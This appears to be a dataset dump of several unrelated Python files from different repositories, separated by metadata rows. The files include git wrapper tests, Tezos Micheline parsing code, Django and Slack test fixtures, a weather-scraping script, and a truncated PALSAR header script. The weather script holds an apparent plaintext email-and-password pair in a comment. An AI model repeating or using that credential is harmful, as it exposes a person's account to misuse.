git.create_tag("new_tag_1", "this is my test tag")
# Check, tag should not be pushed yet.
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git_updater = get_fs_class()(config)
git_updater.clone(mock_initialized_remote[3])
git_updater.checkout("master")
# Make sure it pulled content
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
# Check tags
assert len(git_updater.list_tags()) == 1
assert git_updater.list_tags()[0]["name"] == "test_tag_1"
# Push Tag
git.push(tags=True)
# Fetch and check tags
git_updater.fetch()
assert len(git_updater.list_tags()) == 2
assert git_updater.list_tags()[0]["name"] == "new_tag_1"
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_merge(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
cloned_working_dir = mock_initialized_remote[1]
# Get a clone of the remote repo
git = mock_initialized_remote[0]
# Create and checkout a new branch
git.create_branch("future_branch")
git.checkout("future_branch")
# Add a file to future branch and commit
write_file(git, "test3.txt", "adding a new file Content", commit_msg="add commit")
# Make sure data is there
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
# Checkout master
git.checkout("master")
# New file shouldn't be there
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is False
# Merge future branch into master
git.merge("future_branch")
# New file should be there
assert os.path.isfile(os.path.join(cloned_working_dir, 'test1.txt')) is True
assert os.path.isfile(os.path.join(cloned_working_dir, 'test2.txt')) is False
assert os.path.isfile(os.path.join(cloned_working_dir, 'test3.txt')) is True
def test_discard_changes(self, mock_initialized):
"""Test discarding all changes in a repo"""
git = mock_initialized[0]
working_directory = mock_initialized[1]
# Create file
write_file(git, "test_add1.txt", "entry 1", commit_msg="adding file 1")
write_file(git, "test_add2.txt", "entry 2", commit_msg="adding file 2")
# Verify Clean
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
# Edit both files
write_file(git, "test_add1.txt", "entry 1 updated", add=False)
write_file(git, "test_add2.txt", "entry 2 updated", add=False)
# Verify Edits exist
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 0
# Discard Single file change changes
git.discard_changes("test_add2.txt")
# Verify Edits gone
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 1
assert status["unstaged"][0][0] == "test_add1.txt"
assert len(status["untracked"]) == 0
# Edit both files again
write_file(git, "test_add1.txt", "entry 1 updated", add=False)
write_file(git, "test_add2.txt", "entry 2 updated", add=False)
# Verify Edits exist
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 2
assert len(status["untracked"]) == 0
# Discard All changes
git.discard_changes()
# Verify Edits gone
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
def test_add_submodule(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
remote_working_dir = mock_initialized_remote[3]
# Create a new repo
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
git = get_fs_class()(config)
git.initialize()
write_file(git, "blah.txt", "blaaah", commit_msg="First commit")
# List submodules
assert len(git.list_submodules()) == 0
# Add a submodule
git.add_submodule("test_sub", "test", remote_working_dir)
# List submodules
assert len(git.list_submodules()) == 1
sm = git.list_submodules()[0]
assert sm["name"] == "test_sub"
assert sm["url"] == remote_working_dir
assert sm["branch"] == "master"
# Should be clean
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert os.path.isfile(os.path.join(scratch_working_dir, "test", 'test1.txt')) is True
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def test_remove_submodule(self, mock_initialized_remote):
"""Method to test pushing to a remote"""
remote_working_dir = mock_initialized_remote[3]
# Create a new repo
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
git = get_fs_class()(config)
git.initialize()
write_file(git, "blah.txt", "blaaah", commit_msg="First commit")
# List submodules
assert len(git.list_submodules()) == 0
# Add a submodule
git.add_submodule("test_sub", "test", remote_working_dir)
# List submodules
assert len(git.list_submodules()) == 1
sm = git.list_submodules()[0]
assert sm["name"] == "test_sub"
assert sm["url"] == remote_working_dir
assert sm["branch"] == "master"
# Should be clean
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert os.path.isfile(os.path.join(scratch_working_dir, "test", 'test1.txt')) is True
# Delete the submodule reference
git.remove_submodules("test_sub")
# Should be clean and data should be gone
status = git.status()
assert len(status["staged"]) == 0
assert len(status["unstaged"]) == 0
assert len(status["untracked"]) == 0
assert os.path.isfile(os.path.join(scratch_working_dir, "test", 'test1.txt')) is False
# Delete temp dir
shutil.rmtree(scratch_working_dir)
| 37.968708
| 138
| 0.628172
|
d00f49e92d6e31dd9476628571c27cc57d9d9bf4
| 70
|
py
|
Python
|
tests/RME/__init__.py
|
UofU-Cryosphere/weather_forecast_retrieval
|
b06fe2e09b49ace9eba55bf424c1b2d1e358858c
|
[
"CC0-1.0"
] | 6
|
2017-12-20T22:42:24.000Z
|
2021-08-07T03:32:27.000Z
|
tests/RME/__init__.py
|
UofU-Cryosphere/weather_forecast_retrieval
|
b06fe2e09b49ace9eba55bf424c1b2d1e358858c
|
[
"CC0-1.0"
] | 26
|
2019-03-07T17:47:13.000Z
|
2021-06-25T15:43:27.000Z
|
tests/RME/__init__.py
|
UofU-Cryosphere/weather_forecast_retrieval
|
b06fe2e09b49ace9eba55bf424c1b2d1e358858c
|
[
"CC0-1.0"
] | 3
|
2019-03-08T07:28:59.000Z
|
2021-02-12T21:59:12.000Z
|
from .RME_test_case import RMETestCase
__all__ = [
RMETestCase
]
| 11.666667
| 38
| 0.742857
|
c5256733b825192d80bddd8f6ad0ecea8e00975a
| 114
|
py
|
Python
|
utils/nn_utils.py
|
isse-augsburg/adaptive-spreading
|
3e423f888ff07257111fc95c3276024c4c44036d
|
[
"MIT"
] | null | null | null |
utils/nn_utils.py
|
isse-augsburg/adaptive-spreading
|
3e423f888ff07257111fc95c3276024c4c44036d
|
[
"MIT"
] | null | null | null |
utils/nn_utils.py
|
isse-augsburg/adaptive-spreading
|
3e423f888ff07257111fc95c3276024c4c44036d
|
[
"MIT"
] | null | null | null |
def count_trainable_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
| 22.8
| 72
| 0.754386
|
0c2f399d296a66003bde4226e83d80fd01902ae5
| 15,579
|
py
|
Python
|
pytezos/michelson/micheline.py
|
juztin/pytezos-1
|
7e608ff599d934bdcf129e47db43dbdb8fef9027
|
[
"MIT"
] | null | null | null |
pytezos/michelson/micheline.py
|
juztin/pytezos-1
|
7e608ff599d934bdcf129e47db43dbdb8fef9027
|
[
"MIT"
] | null | null | null |
pytezos/michelson/micheline.py
|
juztin/pytezos-1
|
7e608ff599d934bdcf129e47db43dbdb8fef9027
|
[
"MIT"
] | null | null | null |
from typing import Dict
from datetime import datetime
from os.path import join
from decimal import Decimal
from collections import namedtuple, defaultdict
from functools import lru_cache
from pytezos.encoding import forge_public_key, forge_address, forge_base58
from pytezos.michelson.formatter import micheline_to_michelson
from pytezos.michelson.grammar import MichelsonParser
from pytezos.repl.parser import parse_expression, dispatch_core_map
Nested = namedtuple('Nested', ['prim', 'args'])
Schema = namedtuple('Schema', ['metadata', 'bin_types', 'bin_names', 'json_to_bin'])
class Pair(tuple):
pass
@lru_cache(maxsize=None)
def michelson_parser():
return MichelsonParser()
def skip_nones(**kwargs) -> dict:
return {k: v for k, v in kwargs.items() if v is not None}
def encode_literal(value, prim, binary=False):
core_type = 'string'
if prim in ['int', 'nat', 'big_map']:
core_type = 'int'
elif prim == 'timestamp':
if isinstance(value, int):
core_type = 'int'
elif isinstance(value, datetime):
value = value.strftime('%Y-%m-%dT%H:%M:%SZ')
elif prim == 'mutez':
core_type = 'int'
if isinstance(value, Decimal):
value = int(value * 10 ** 6)
elif prim == 'bool':
core_type = 'prim'
value = 'True' if value else 'False'
elif prim == 'bytes':
core_type = 'bytes'
if isinstance(value, bytes):
value = value.hex()
elif prim == 'key' and binary:
core_type = 'bytes'
value = forge_public_key(value).hex()
elif prim in ['address', 'contract', 'key_hash'] and binary:
core_type = 'bytes'
value = forge_address(value, tz_only=prim == 'key_hash').hex()
elif prim == 'chain_id': # and binary ?
core_type = 'bytes'
value = forge_base58(value).hex()
return {core_type: str(value)}
def get_flat_nested(nested: Nested):
flat_args = list()
for arg in nested.args:
if isinstance(arg, Nested) and arg.prim == nested.prim:
flat_args.extend(get_flat_nested(arg))
else:
flat_args.append(arg)
return flat_args
def collapse_micheline(code) -> dict:
metadata = dict()
def get_annotation(x, prefix, default=None):
return next((a[1:] for a in x.get('annots', []) if a[0] == prefix), default)
def parse_node(node, path='0', parent_prim=None, inherited_name=None):
if node['prim'] in ['storage', 'parameter']:
return parse_node(node['args'][0])
fieldname = get_annotation(node, '%')
typename = get_annotation(node, ':')
metadata[path] = skip_nones(
prim=node['prim'],
typename=typename,
fieldname=fieldname,
inherited_name=inherited_name
)
if node['prim'] == 'option':
return parse_node(
node=node['args'][0],
path=path + '0',
parent_prim=parent_prim,
inherited_name=fieldname
)
elif node['prim'] in ['lambda', 'contract']:
metadata[path]['parameter'] = micheline_to_michelson(node['args'][0], inline=True)
return dict(path=path, args=[]) # stop there
args = [
parse_node(arg, path=path + str(i), parent_prim=node['prim'])
for i, arg in enumerate(node.get('args', []))
]
if node['prim'] in ['pair', 'or']:
res = Nested(node['prim'], args)
is_struct = node['prim'] == 'pair' and (typename or fieldname or inherited_name)
if is_struct or parent_prim != node['prim']:
args = get_flat_nested(res)
else:
return res
if args:
metadata[path]['args'] = list(map(lambda x: x['path'], args))
return dict(path=path, args=args)
parse_node(code)
return metadata
def build_maps(metadata: dict):
bin_types = {k: v['prim'] for k, v in metadata.items()}
bin_names, json_to_bin = {}, {}
def is_unit(bin_path):
node = metadata[bin_path]
return node.get('prim') == 'unit'
def get_union_names(node):
names = []
for i, arg_path in enumerate(node['args']):
arg = metadata[arg_path]
name = arg.get('inherited_name', arg.get('fieldname', arg.get('typename')))
if name:
name = name.replace('_Liq_entry_', '')
else:
name = f'entrypoint_{i}'
names.append(name)
return names
def get_tuple_names(node):
names, unnamed = [], True
for i, arg_path in enumerate(node['args']):
arg = metadata[arg_path]
name = arg.get('typename', arg.get('fieldname', arg.get('inherited_name')))
if name and name not in names:
unnamed = False
else:
name = f'{arg["prim"]}_{i}'
names.append(name)
return names, unnamed
def parse_node(bin_path='0', json_path='/'):
node = metadata[bin_path]
if node['prim'] in ['list', 'set']:
parse_node(node['args'][0], join(json_path, '{}'))
elif node['prim'] in ['map', 'big_map']:
key_node = metadata[bin_path + '0']
if key_node['prim'] == 'pair':
bin_types[bin_path + '0'] = 'keypair'
parse_node(node['args'][1], join(json_path, '{}'))
elif node['prim'] == 'or':
names = get_union_names(node)
if all(map(is_unit, node['args'])):
bin_types[bin_path] = 'enum'
for i, arg_path in enumerate(node['args']):
parse_node(arg_path, join(json_path, names[i]))
bin_types[arg_path] = names[i]
bin_names[arg_path] = names[i]
else:
bin_types[bin_path] = 'router'
for i, arg_path in enumerate(node['args']):
parse_node(arg_path, join(json_path, names[i]))
bin_names[arg_path] = names[i]
elif node['prim'] == 'pair':
names, unnamed = get_tuple_names(node)
bin_types[bin_path] = 'tuple' if unnamed else 'namedtuple'
for i, arg_path in enumerate(node['args']):
parse_node(arg_path, join(json_path, str(i) if unnamed else names[i]))
bin_names[arg_path] = None if unnamed else names[i]
json_to_bin[json_path] = bin_path
parse_node()
return bin_types, bin_names, json_to_bin
def parse_micheline(val_expr, type_expr, schema: Schema, bin_root='0'):
def flatten_pair(args) -> Pair:
res = list()
for arg in args:
if isinstance(arg, Pair):
res.extend(flatten_pair(arg))
else:
res.append(arg)
return Pair(res)
def decode_selector(val_node, type_node, val, type_path):
bin_type = schema.bin_types[type_path]
if bin_type == 'map':
return dict(val)
elif bin_type == 'big_map':
return dict(val) if isinstance(val_node, list) else val
elif bin_type == 'option':
return val[0] if val is not None else None
elif bin_type == 'pair':
return flatten_pair(val)
elif bin_type == 'tuple':
return list(flatten_pair(val))
elif bin_type == 'keypair':
return tuple(flatten_pair(val))
elif bin_type == 'namedtuple':
names = list(map(lambda x: schema.bin_names[x], schema.metadata[type_path]['args']))
return dict(zip(names, flatten_pair(val)))
elif bin_type in ['or', 'router', 'enum']:
arg_path = type_path + {'Left': '0', 'Right': '1'}[val_node['prim']]
if schema.bin_types[arg_path] == 'option':
arg_path += '0'
is_leaf = schema.metadata[arg_path]['prim'] != 'or'
res = {schema.bin_names[arg_path]: val[0]} if is_leaf else val[0]
return next(iter(res)) if bin_type == 'enum' else res
elif bin_type == 'unit':
return None
elif bin_type == 'lambda':
return micheline_to_michelson(val)
elif bin_type == 'timestamp':
return dispatch_core_map(val_node, {'string': str, 'int': int})
elif bin_type == 'bytes':
return val.hex()
elif bin_type == 'mutez':
return Decimal(val) / 10 ** 6
else:
return val
if type_expr['prim'] in ['storage', 'parameter']:
type_expr = type_expr['args'][0]
for idx in bin_root[1:]:
type_expr = type_expr['args'][int(idx)]
return parse_expression(val_expr, type_expr, decode_selector, bin_root)
def parse_json(data, schema: Schema, bin_root='0'):
bin_values = defaultdict(dict) # type: Dict[str, dict]
def parse_entry(bin_path, index):
for i in range(len(bin_path) - 1, 0, -1):
lpath = bin_path[:i]
if schema.bin_types[lpath] in ['or', 'router', 'enum']:
bin_values[lpath][index] = bin_path[i]
elif schema.bin_types[lpath] in ['list', 'set', 'map', 'big_map']:
return
def parse_comparable(key, bin_path, index):
if schema.bin_types[bin_path] == 'keypair':
assert isinstance(key, tuple), f'tuple expected, got {key}'
for i, arg_path in enumerate(schema.metadata[bin_path]['args']):
assert i < len(key), f'not enough elements in tuple {key}'
bin_values[arg_path][index] = key[i]
else:
bin_values[bin_path][index] = key
def parse_node(node, json_path, index='0'):
bin_path = schema.json_to_bin[json_path]
bin_type = schema.bin_types[bin_path]
if isinstance(node, dict):
if bin_type in ['map', 'big_map']:
bin_values[bin_path][index] = str(len(node))
parse_entry(bin_path, index)
for i, (key, value) in enumerate(node.items()):
parse_comparable(key, bin_path=bin_path + '0', index=f'{index}:{i}')
parse_node(value, json_path=join(json_path, '{}'), index=f'{index}:{i}')
elif bin_type in ['pair', 'or', 'namedtuple', 'router']:
for key, value in node.items():
parse_node(value, json_path=join(json_path, key), index=index)
else:
assert False, (node, bin_type)
elif isinstance(node, list):
if bin_type in ['list', 'set']:
bin_values[bin_path][index] = str(len(node))
parse_entry(bin_path, index)
for i, value in enumerate(node):
parse_node(value, json_path=join(json_path, '{}'), index=f'{index}:{i}')
elif bin_type in ['pair', 'tuple']:
for i, value in enumerate(node):
parse_node(value, json_path=join(json_path, str(i)), index=index)
elif bin_type == 'lambda':
bin_values[bin_path][index] = node
elif bin_type == 'or':
assert False, (node, bin_path) # must be at least lr encoded
else:
if bin_type == 'enum':
parse_node(node, json_path=join(json_path, node), index=index)
else:
bin_values[bin_path][index] = node
parse_entry(bin_path, index)
if schema.bin_types[bin_root] == 'option':
bin_root += '0'
json_root = next((k for k, v in schema.json_to_bin.items() if v == bin_root), None)
if json_root:
parse_node(data, json_root)
else:
parse_comparable(data, bin_root, index='0')
return dict(bin_values)
def make_micheline(bin_values: dict, bin_types: dict, bin_root='0', binary=False):
def encode_node(bin_path, index='0'):
bin_type = bin_types[bin_path]
value = bin_values[bin_path][index] if bin_path in bin_values else None
optional = len(bin_path) > 1 and bin_types[bin_path[:-1]] == 'option'
if optional and not any(filter(
lambda x: x.startswith(bin_path) and bin_values[x][index] is not None, bin_values)):
# TODO: unit???
return dict(prim='None')
if bin_type == 'option':
return encode_node(bin_path + '0', index)
if bin_type in ['pair', 'tuple', 'keypair', 'namedtuple']:
assert value is None
res = dict(
prim='Pair',
args=list(map(lambda x: encode_node(bin_path + x, index), '01'))
)
elif bin_type in ['map', 'big_map']:
assert value is not None
if isinstance(value, int):
assert bin_type == 'big_map'
res = encode_literal(value, bin_type)
else:
res = [dict(prim='Elt',
args=[encode_node(bin_path + '0', f'{index}:{i}'),
encode_node(bin_path + '1', f'{index}:{i}')])
for i in range(int(value or '0'))]
elif bin_type in ['set', 'list']:
assert value is not None
res = [encode_node(bin_path + '0', f'{index}:{i}')
for i in range(int(value or '0'))]
elif bin_type in ['or', 'router', 'enum']:
assert value is not None
res = dict(prim={'0': 'Left', '1': 'Right'}[value],
args=[encode_node(bin_path + value, index)])
elif bin_type == 'lambda':
assert value is not None
res = michelson_to_micheline(bin_values[bin_path][index])
elif bin_type == 'unit':
res = dict(prim='Unit')
else:
assert value is not None
if value == bin_type:
res = dict(prim='Unit')
else:
res = encode_literal(value, bin_type, binary)
if optional:
return dict(prim='Some', args=[res])
else:
return res
return encode_node(bin_root)
def make_default(bin_types: dict, root='0'):
def encode_node(bin_path):
bin_type = bin_types[bin_path]
if bin_type == 'option':
return dict(prim='None')
elif bin_type in ['pair', 'tuple', 'namedtuple']:
return dict(
prim='Pair',
args=list(map(lambda x: encode_node(bin_path + x), '01'))
)
elif bin_type in ['map', 'big_map', 'set', 'list']:
return []
elif bin_type in ['int', 'nat', 'mutez', 'timestamp']:
return {'int': '0'}
elif bin_type in ['string', 'bytes']:
return {'string': ''}
elif bin_type == 'bool':
return {'prim': 'False'}
elif bin_type == 'unit':
return {'prim': 'Unit'}
else:
raise ValueError(f'Cannot create default value for `{bin_type}` at `{bin_path}`')
return encode_node(root)
def michelson_to_micheline(data, parser=None):
"""
Converts michelson source text into Micheline expression
:param data: Michelson string
:param parser: custom Michelson parser
:return: Micheline expression
"""
if parser is None:
parser = michelson_parser()
if data[0] == '(' and data[-1] == ')':
data = data[1:-1]
return parser.parse(data)
def is_optional(schema, bin_path):
return len(bin_path) > 1 and schema.bin_types[bin_path[:-1]] == 'option'
| 36.314685
| 100
| 0.554978
|
990296b3be357c15f0c87a6a18ea2e562b92a93c
| 478
|
py
|
Python
|
OM300Ch7.py
|
JoshChima/OM300_Mastered
|
db17c8ca1eb1045b8b96fde34f193767d038629f
|
[
"MIT"
] | null | null | null |
OM300Ch7.py
|
JoshChima/OM300_Mastered
|
db17c8ca1eb1045b8b96fde34f193767d038629f
|
[
"MIT"
] | null | null | null |
OM300Ch7.py
|
JoshChima/OM300_Mastered
|
db17c8ca1eb1045b8b96fde34f193767d038629f
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
BEP = lambda fcX, fcY, vcX, vcY: (fcY - fcX)/(vcY-vcX)
TotCost = lambda fc,vc,nu: fc+(vc*nu)
Profit = lambda fc,vc,nu,ppu: ppu*nu-TotCost(fc,vc,nu)
GPEbe = BEP(150000,200000,18,14)
FMSbe = BEP(200000,480000,14,13)
DMbe = BEP(480000, 200000, 13, 14)
Miy = BEP(65000,26000,12.5,18.5)
print(GPEbe)
print(FMSbe)
print(DMbe)
print(Miy)
print(Profit(83000,1.15,110000,2.3))
print(Profit(41000,1.5,110000,2.3))
print(TotCost(26000,18,365*50))
| 23.9
| 54
| 0.700837
|
50e77822ba329f7da4568ea683c46b0afa2c316f
| 4,158
|
py
|
Python
|
remo/reports/tests/test_util.py
|
Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d
|
23ca8d46496b491fbdb2b8a72c91e75372932f23
|
[
"BSD-3-Clause"
] | 27
|
2015-01-02T18:47:56.000Z
|
2021-08-14T11:48:24.000Z
|
remo/reports/tests/test_util.py
|
Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d
|
23ca8d46496b491fbdb2b8a72c91e75372932f23
|
[
"BSD-3-Clause"
] | 450
|
2015-01-02T12:29:50.000Z
|
2020-10-27T21:41:38.000Z
|
remo/reports/tests/test_util.py
|
Mozilla-GitHub-Standards/6f6b18ac63685c6bf60fff95a3bbcc598378c77ceb14c7404172c570dd1e971d
|
23ca8d46496b491fbdb2b8a72c91e75372932f23
|
[
"BSD-3-Clause"
] | 81
|
2015-01-10T23:59:32.000Z
|
2021-08-19T17:08:56.000Z
|
from datetime import timedelta
from django.core.urlresolvers import reverse
from django.utils.timezone import now
import mock
from nose.tools import eq_, ok_
from remo.base.templatetags.helpers import urlparams
from remo.base.tests import RemoTestCase
from remo.base.utils import month2number
from remo.profiles.tests import UserFactory
from remo.reports.tests import NGReportFactory
from remo.reports.utils import count_user_ng_reports, get_last_report
class TestUserCommitedReports(RemoTestCase):
"""Tests for count_user_ng_reports utility."""
def test_current_streak(self):
user = UserFactory.create()
# Add a report every 22 hours for the last 4 days (5 reports)
for i in range(0, 4):
NGReportFactory.create(user=user,
report_date=(now().date()
- timedelta(days=i)))
eq_(count_user_ng_reports(user, current_streak=True), 4)
def test_longest_streak(self):
user = UserFactory.create()
past_day = now().date() - timedelta(days=30)
# Add 7 continuous reports somewhere in the past
for i in range(0, 7):
NGReportFactory.create(user=user,
report_date=(past_day - timedelta(days=i)))
# Add a report, one each day for the last 4 days (6 reports)
for i in range(0, 3):
NGReportFactory.create(user=user,
report_date=(now().date()
- timedelta(days=i)))
eq_(count_user_ng_reports(user, longest_streak=True), 7)
def test_get_last_two_weeks_reports(self):
user = UserFactory.create()
# Add 4 reports more than a day apart
for i in range(8, 0, -2):
NGReportFactory.create(user=user,
report_date=(now().date()
- timedelta(days=i)))
# Get the reports added in the last two weeks
eq_(count_user_ng_reports(user, period=2), 4)
def test_get_last_ten_weeks_reports(self):
user = UserFactory.create()
# Add 4 reports more than a day apart
for i in range(8, 0, -2):
NGReportFactory.create(user=user,
report_date=(now().date()
- timedelta(days=i)))
# Get the reports added in the last 10 weeks
eq_(count_user_ng_reports(user, period=10), 4)
class Month2NumberTest(RemoTestCase):
@mock.patch('remo.reports.views.month2number', wraps=month2number)
def test_base(self, mocked_month2number):
user = UserFactory.create(groups='Rep')
reports_url = reverse('list_ng_reports_rep',
args=(user.userprofile.display_name,))
reports_url = urlparams(reports_url, year='2014', month='Apri')
response = self.client.get(reports_url, follow=True)
mocked_month2number.assert_called_once_with(u'Apri')
eq_(response.status_code, 404)
class GetUserLastReportTest(RemoTestCase):
"""Test get last report date helper."""
def test_get_last_report_past(self):
report_date = now().date() - timedelta(weeks=5)
user = UserFactory.create(groups=['Rep'])
NGReportFactory.create(user=user, report_date=report_date)
eq_(get_last_report(user).report_date, report_date)
def test_get_last_report_future(self):
past_date = now().date() - timedelta(weeks=5)
future_date = now().date() + timedelta(weeks=2)
user = UserFactory.create(groups=['Rep'])
NGReportFactory.create(user=user, report_date=past_date)
NGReportFactory.create(user=user, report_date=future_date)
eq_(get_last_report(user).report_date, past_date)
def test_last_report_date_none(self):
user = UserFactory.create(groups=['Rep'])
ok_(not get_last_report(user))
future_date = now().date() + timedelta(weeks=2)
NGReportFactory.create(user=user, report_date=future_date)
ok_(not get_last_report(user))
| 41.58
| 78
| 0.626263
|
a9ae97f5867a1dd53a79283681048adfd98b461c
| 2,050
|
py
|
Python
|
weather_app.py
|
rucsoft/weather
|
ad522c3688ebe4eeaaa671f2bdf3dcff9c2cabf2
|
[
"MIT"
] | null | null | null |
weather_app.py
|
rucsoft/weather
|
ad522c3688ebe4eeaaa671f2bdf3dcff9c2cabf2
|
[
"MIT"
] | null | null | null |
weather_app.py
|
rucsoft/weather
|
ad522c3688ebe4eeaaa671f2bdf3dcff9c2cabf2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import datetime
import matplotlib as plt
import scrapy
import requests
import lxml
from io import StringIO, BytesIO
today=(datetime.date.today()+datetime.timedelta(1)).isoformat()
tomorrow=(datetime.date.today()+datetime.timedelta(2)).isoformat()
'''rucsoft@gmail.com Rucsoft5^'''
class person:
def __init__(self,email):
self.email=email
self.zipcodes=[]
def add_location(self,zipcode):
self.zipcodes.append(zipcode)
def show_locations(self):
print(self.zipcodes)
def create_zip(zip_array):
useful_ziplist = ''
for i in range(0,len(zip_array)):
if i == len(zip_array)-1:
useful_ziplist = useful_ziplist+str(zip_array[i])
else:
useful_ziplist= useful_ziplist + str(zip_array[i]) + '+'
return useful_ziplist
'''
def get_weather_data(zip_array, today, tomorrow):
str_zipcode= create_zip(zip_array)
xml= 'http://graphical.weather.gov/xml/sample_products/browser_interface/ndfdXMLclient.php?zipCodeList='+str_zipcode+'&product=time-series&begin=' + today + 'T00:00:00&end=' + tomorrow + 'T00:00:00&maxt=maxt&mint=mint&pop12=pop12'
page = requests.get(xml)
tree = lxml.etree.fromstring(page.content)
for i in range(0, len(zip_array)):
find_text = tree.xpath('//data/parameters['i']*')
for j in range(0, len(find_text)):
'''
paul=person('ggg')
paul.add_location(70605)
paul.add_location(48316)
xml_zipcode = create_zip(paul.zipcodes)
xml= 'http://graphical.weather.gov/xml/sample_products/browser_interface/ndfdXMLclient.php?zipCodeList='+xml_zipcode+'&product=time-series&begin=' + today + 'T00:00:00&end=' + tomorrow + 'T00:00:00&maxt=maxt&mint=mint&pop12=pop12'
page = requests.get(xml)
tree = lxml.etree.fromstring(page.content)
find_text = tree.xpath('//data/parameters[1]//*')
find_text3 = tree.xpath('//data/parameters[1]//value')
find_text2 = tree.xpath('//data/parameters[1]//name')
| 30.147059
| 234
| 0.685854
|
a5a542483967e09f9001092e2c3d0033fe79a9f2
| 1,878
|
py
|
Python
|
tests/conftest.py
|
haeena/python-slack-events-api-asgi
|
6f4f0b207707468d10f165ba90c775bb7defd00e
|
[
"MIT"
] | 2
|
2020-01-16T04:23:43.000Z
|
2020-09-04T23:47:35.000Z
|
tests/conftest.py
|
haeena/python-slack-events-api-asgi
|
6f4f0b207707468d10f165ba90c775bb7defd00e
|
[
"MIT"
] | 2
|
2020-01-14T17:05:29.000Z
|
2020-01-29T20:06:38.000Z
|
tests/conftest.py
|
haeena/slackevent-responder
|
6f4f0b207707468d10f165ba90c775bb7defd00e
|
[
"MIT"
] | null | null | null |
import random
import unicodedata
import pytest
from slackevent_responder import SlackEventApp
from .helpers.helpers import create_signature, load_event_fixture
@pytest.fixture(scope="session")
def signing_secret():
# I'm not completely sure, but it seems to be something like...
ss_letters = "0123456789abcdef"
ss_length = 32
signing_secret = "".join(
random.choice(ss_letters) for i in range(ss_length)
)
return signing_secret
@pytest.fixture(scope="session")
def slack_event_path():
return "/slack/events"
@pytest.fixture(scope="function")
def app(signing_secret, slack_event_path):
app = SlackEventApp(
slack_signing_secret=signing_secret, path=slack_event_path
)
return app
@pytest.fixture(scope="session", params=["correct", "incorrect"])
def verify_signatures_fixture(request, signing_secret):
if request.param == "incorrect":
return (
False,
"",
"",
"",
"v0=0000000000000000000000000000000000000000000000000000000000000000",
)
# randomize
unicode_glyphs = "".join(
chr(c)
for c in range(65533)
# use the unicode categories that don't include control codes
if unicodedata.category(chr(c))[0] in ("LMNPSZ")
)
max_data_length = 1024
timestamp = str(random.randint(0, 2 ** 31 - 1))
data = "".join(
random.choice(unicode_glyphs)
for i in range(random.randint(0, max_data_length))
)
request_signature = create_signature(signing_secret, timestamp, data)
return (True, signing_secret, timestamp, data, request_signature)
@pytest.fixture
def reaction_event_fixture():
return load_event_fixture("reaction_added", as_string=False)
@pytest.fixture
def url_challenge_fixture():
return load_event_fixture("url_challenge", as_string=False)
| 25.726027
| 82
| 0.687433
|
0ee45e2aff32ac359ff272f10427bf0ce34c60b7
| 3,277
|
py
|
Python
|
OddsAndEnds/ALOSPALSARTiles/addENVIHeader_GMW_ScanSAR.py
|
petebunting/rsgis_scripts
|
b35b0403cdfad6c63824d4f8c038f190cdb5978d
|
[
"MIT"
] | 4
|
2020-09-16T10:45:15.000Z
|
2021-05-06T04:34:32.000Z
|
OddsAndEnds/ALOSPALSARTiles/addENVIHeader_GMW_ScanSAR.py
|
petebunting/rsgis_scripts
|
b35b0403cdfad6c63824d4f8c038f190cdb5978d
|
[
"MIT"
] | null | null | null |
OddsAndEnds/ALOSPALSARTiles/addENVIHeader_GMW_ScanSAR.py
|
petebunting/rsgis_scripts
|
b35b0403cdfad6c63824d4f8c038f190cdb5978d
|
[
"MIT"
] | 2
|
2020-07-06T18:03:40.000Z
|
2022-02-15T12:45:34.000Z
|
#! /usr/bin/env python
"""
add_gmw_palsar_header.py
Adds ENVI header file to Global Mangrove Watch
format PALSAR FBD files.
Dan Clewley
"""
from __future__ import print_function
import os
import sys
import re
import glob
import argparse
def create_envi_headers(inFileDIR):
"""
Create ENVI header
for all files
"""
# Change to input directory
os.chdir(inFileDIR)
try:
inHHFile = glob.glob('*HH')[0]
inDateFile = glob.glob('*_date')[0]
inIncFile = glob.glob('*_linci')[0]
inMaskFile = glob.glob('*_mask')[0]
inHeaderFile = glob.glob('KC*.hdr')[0]
except IndexError:
print('Not all expected files were found in input directory')
print('Found:')
all_files = os.listdir(inFileDIR)
print('\n'.join(all_files))
raise
inHHHeaderFile = inHHFile + '.hdr'
